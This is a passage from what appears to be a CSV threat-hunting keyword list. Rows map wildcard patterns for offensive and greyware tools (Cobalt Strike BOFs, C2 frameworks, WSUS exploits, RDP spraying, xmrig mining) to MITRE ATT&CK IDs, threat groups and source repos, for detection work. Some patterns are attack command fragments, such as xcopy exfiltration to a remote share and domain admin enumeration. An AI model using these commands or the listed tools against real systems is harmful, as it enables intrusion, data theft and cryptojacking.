T1078.003 - T1059.003,TA0006 - TA0004 - TA0002,N/A,N/A,Exploitation tools,https://github.com/slemire/WSPCoerce,1,0,N/A,9,3,202,29,2023-09-07T14:43:36Z,2023-07-26T17:20:42Z -*wss://*.tunnels.api.visualstudio.com/api/v1/Connect/*,greyware_tool_keyword,dev-tunnels,Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks,T1021.003 - T1105 - T1090,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*WSUSpendu*,offensive_tool_keyword,WSUSpendu,At BlackHat USA 2015. the WSUSpect attack scenario has been released.Approximately at the same time. some french engineers have been wondering if it would be possible to use a compromised WSUS server to extend the compromise to its clients. 
similarly to this WSUSpect attack. After letting this topic rest for almost two years. we've been able. at Alsid and ANSSI. to demonstrate this attack.,T1563 - T1204 - T1210 - T1071,TA0001 - TA0009,N/A,N/A,Sniffing & Spoofing,https://github.com/AlsidOfficial/WSUSpendu,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*wsuxploit*,offensive_tool_keyword,wsuxploit,This is a MiTM weaponized exploit script to inject 'fake' updates into non-SSL WSUS traffic. It is based on the WSUSpect Proxy application that was introduced to public on the Black Hat USA 2015 presentation. 'WSUSpect Compromising the Windows Enterprise via Windows Update,T1557.001 - T1557.002 - T1573 - T1210.001,TA0001 - TA0002 - TA0007 - TA0008,N/A,N/A,Sniffing & Spoofing,https://github.com/pimps/wsuxploit,1,1,N/A,N/A,3,267,50,2022-11-25T10:04:15Z,2017-06-30T01:06:41Z -*wts_enum_remote_processes*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files (BOFs) for shells and lols,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29,C2,https://github.com/RiccardoAncarani/BOFs,1,1,N/A,10,10,104,12,2021-09-14T09:03:58Z,2021-08-27T10:04:12Z -*wumb0/rust_bof*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object Files (BOFs) written in rust with rust core and alloc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/wumb0/rust_bof,1,1,N/A,10,10,189,22,2023-03-03T22:53:02Z,2022-02-28T23:46:00Z -*WwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkALgBuAGEAbQBlAAoA*,offensive_tool_keyword,nimbo-c2,Nimbo-C2 is yet another (simple and lightweight) C2 framework,T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011,N/A,N/A,C2,https://github.com/itaymigdal/Nimbo-C2,1,1,N/A,10,10,234,35,2023-10-01T08:09:18Z,2022-10-08T19:02:58Z -*www.exploit-db.com/download/*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing 
tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*www.ip-api.com*,greyware_tool_keyword,ip-api.com,get public ip address,T1016 - T1071.001,TA0005 - TA0002,N/A,Volt Typhoon,Reconnaissance,https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF,1,1,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*www.kali.org/get-kali/*,offensive_tool_keyword,kali,Kali Linux is an open-source. Debian-based Linux distribution geared towards various information security tasks. such as Penetration Testing. Security Research. Computer Forensics and Reverse Engineering,T1210.001 - T1185 - T1059 - T1400 - T1506 - T1213,TA0001 - TA0002 - TA0009,N/A,N/A,Exploitation OS,https://www.kali.org/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*www.securityfocus.com/archive/1/514379*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*www.vsecurity.com/download/tools/*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*www.wfuzz.org*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*wxfuzz.bat*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information 
Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*wxfuzz.py*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*WypdIENhbid0IENvbm5lY3QgQWxpeXVuIEJ1Y2tldC4=*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*WypdIFRoZSBCdWNrZXQgb3IgUmVmbGVjdGl2ZSBETEwgVVJJIGlzIEVtcHR5Lg==*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. 
Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*WytdIEluamVjdGVkIHRoZSA=*,offensive_tool_keyword,C2 related tools,Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. 
and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Rvn0xsy/Cooolis-ms,1,1,N/A,10,10,868,140,2023-05-22T22:18:47Z,2019-03-31T14:23:57Z -*-x *net group *Domain Admins* /domain*,offensive_tool_keyword,smbmap,SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.,T1210.001 - T1083 - T1213 - T1021,TA0007 - TA0003 - TA0002 - TA0001,N/A,N/A,Information Gathering,https://github.com/ShawnDEvans/smbmap,1,0,N/A,10,10,1554,344,2023-09-14T20:51:52Z,2015-03-16T13:15:00Z -*X32_ClSp_Tcp_Exe.exe*,offensive_tool_keyword,EternalHushFramework,EternalHush Framework is a new open source project that is an advanced C&C framework. 
Designed specifically for Windows operating systems,T1071.001 - T1132.001 - T1059.003 - T1547.001,TA0011 - TA0005 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/APT64/EternalHushFramework,1,0,N/A,10,10,140,21,2023-09-21T19:04:41Z,2023-07-09T09:13:21Z -*X64_ClSp_Tcp_Exe.exe*,offensive_tool_keyword,EternalHushFramework,EternalHush Framework is a new open source project that is an advanced C&C framework. Designed specifically for Windows operating systems,T1071.001 - T1132.001 - T1059.003 - T1547.001,TA0011 - TA0005 - TA0010 - TA0002,N/A,N/A,C2,https://github.com/APT64/EternalHushFramework,1,0,N/A,10,10,140,21,2023-09-21T19:04:41Z,2023-07-09T09:13:21Z -*x64PELoader/*.exe*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*x64win-DynamicNoNull-WinExec-PopCalc-Shellcode*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,1,private github repo,10,,N/A,,, -*x86_64-unknown-uefi*,offensive_tool_keyword,bootkit-rs,Rusty Bootkit - Windows UEFI Bootkit in Rust (Codename: RedLotus),T1542.004 - T1067.002 - T1012 - T1053.005 - T1057,TA0002 - TA0040 - TA0003 - TA0001,N/A,N/A,Defense Evasion,https://github.com/memN0ps/bootkit-rs,1,1,N/A,N/A,5,448,54,2023-09-12T07:23:15Z,2023-04-11T03:53:15Z -*x86PELoader/*.exe*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - 
TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*x86PELoader/test_agent_dll*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*x86PELoader/test_agent_exe*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*x86PELoader/test_proxy_dll*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*x86PELoader/test_proxy_exe*,offensive_tool_keyword,AlanFramework,Alan Framework is a post-exploitation framework useful during red-team activities.,T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018,TA0002 - TA0005 - TA0011 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/enkomio/AlanFramework,1,1,N/A,10,10,430,66,2022-08-23T18:20:33Z,2021-01-26T22:56:50Z -*x90skysn3k*,offensive_tool_keyword,Github Username,Github username known for password exploitation and offensive tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/x90skysn3k,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*xato-net-10-million-usernames.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - 
T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*X-C2-Beacon*,offensive_tool_keyword,DoHC2,DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike,T1090.004 - T1021.002 - T1071.001,TA0011 - TA0008,N/A,N/A,C2,https://github.com/SpiderLabs/DoHC2,1,1,N/A,10,10,432,99,2020-08-07T12:48:13Z,2018-10-23T19:40:23Z -*xcopy /y /d *\msquic_schannel\msquic.dll*,offensive_tool_keyword,ntlmquic,POC tools for exploring SMB over QUIC protocol,T1210.002 - T1210.003 - T1210.004,TA0001,N/A,N/A,Network Exploitation tools,https://github.com/xpn/ntlmquic,1,0,N/A,N/A,2,114,15,2022-04-06T11:22:11Z,2022-04-05T13:01:02Z -*xcopy c:\* \\*\c$*,greyware_tool_keyword,xcopy,command abused by attackers - exfiltraiton to remote host with xcopy,T1059.003 - T1053.005 - T1105 - T1012 - T1057 - T1083 - T1041 - T1036 - T1035 - T1562.001 - T1564.001 - T1564.005 - T1564.002 - T1564.003 - T1027 - T1070.001 - T1112 - T1136,TA0003 - TA0007 - TA0008 - TA0010 - TA0006 - TA0002,N/A,N/A,Data Exfiltration,N/A,1,0,greyware_tools high risks of false positives,N/A,N/A,N/A,N/A,N/A,N/A -*xforcered/CredBandit*,offensive_tool_keyword,cobaltstrike,Proof of concept Beacon Object File (BOF) that uses static x64 syscalls to perform a complete in memory dump of a process and send that back through your already existing Beacon communication channel,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - 
T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/xforcered/CredBandit,1,1,N/A,10,10,218,25,2021-07-14T17:42:41Z,2021-03-17T15:19:33Z -*xforcered/Detect-Hooks*,offensive_tool_keyword,cobaltstrike,Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/xforcered/Detect-Hooks,1,1,N/A,10,10,91,6,2021-07-22T20:13:16Z,2021-07-23T16:10:37Z 
-*xforwardedfor.py*,offensive_tool_keyword,sqlmap,Automatic SQL injection and database takeover tool.,T1190 - T1556 - T1574,TA0001 - TA0002 - TA0003,N/A,N/A,Exploitation tools,https://github.com/sqlmapproject/sqlmap,1,1,N/A,N/A,10,28282,5460,2023-09-28T18:34:55Z,2012-06-26T09:52:15Z -*xFreed0m/RDPassSpray*,offensive_tool_keyword,RDPassSpray,Python3 tool to perform password spraying using RDP,T1110.003 - T1059.006 - T1076.001,TA0001 - TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/xFreed0m/RDPassSpray,1,1,N/A,10,6,588,376,2023-08-17T15:09:50Z,2019-06-05T17:10:42Z -*xfreerdp /v*SOCtest*AllLegitHere*,offensive_tool_keyword,RDPassSpray,Python3 tool to perform password spraying using RDP,T1110.003 - T1059.006 - T1076.001,TA0001 - TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/xFreed0m/RDPassSpray,1,0,N/A,10,6,588,376,2023-08-17T15:09:50Z,2019-06-05T17:10:42Z -*xfrm_poc*lucky0*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*xillwillx*,offensive_tool_keyword,Github Username,github repo username hosting red team tools,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/xillwillx,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*XiphosResearch*,offensive_tool_keyword,exploits,Miscellaneous proof of concept exploit code written at Xiphos Research for testing purposes.,T1203 - T1068 - T1062 - T1059,TA0002 - TA0003 - TA0007,N/A,N/A,Exploitation tools,https://github.com/XiphosResearch/exploits,1,0,N/A,N/A,10,1433,606,2023-07-20T10:15:01Z,2015-03-05T11:15:07Z -*x-ishavocframework*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - 
T1574-001 - T1569-002,TA0002 - TA0003,N/A,N/A,C2,https://github.com/its-a-feature/Mythic,1,1,N/A,10,10,2490,383,2023-10-03T23:06:16Z,2018-07-05T02:09:59Z -*xmendez/wfuzz*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*XML-External-Entity-(XXE)-Payloads*,offensive_tool_keyword,Offensive-Payloads,List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.,T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ,TA0001 - TA0002 - TA0009,N/A,N/A,List,https://github.com/InfoSecWarrior/Offensive-Payloads/,1,1,N/A,N/A,2,116,43,2023-09-11T17:20:51Z,2022-11-18T09:43:41Z -*xmrig-*-bionic-x64.tar.gz*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,1,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*xmrig-*-focal-x64.tar.gz*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,1,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*xmrig-*-freebsd-static-x64.tar.gz*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,1,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*xmrig-*-gcc-win64.zip*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,1,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*xmrig-*-linux-static-x64.tar.gz*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often 
used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,1,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*xmrig-*-linux-x64.tar.gz*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,1,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*xmrig-*-macos-arm64.tar.gz*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,1,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*xmrig-*-macos-x64.tar.gz*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,1,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*xmrig-*-msvc-win64.zip*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,1,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*xmrig.exe -*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*xmrpool.eu:3333*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*xor.exe *.txt*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Shellcode Loader by Golang,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 
- T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/timwhitez/Doge-Loader,1,0,N/A,10,10,277,61,2021-04-22T08:24:59Z,2020-10-09T04:47:54Z -*xor.py *.dll*,offensive_tool_keyword,HadesLdr,Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving 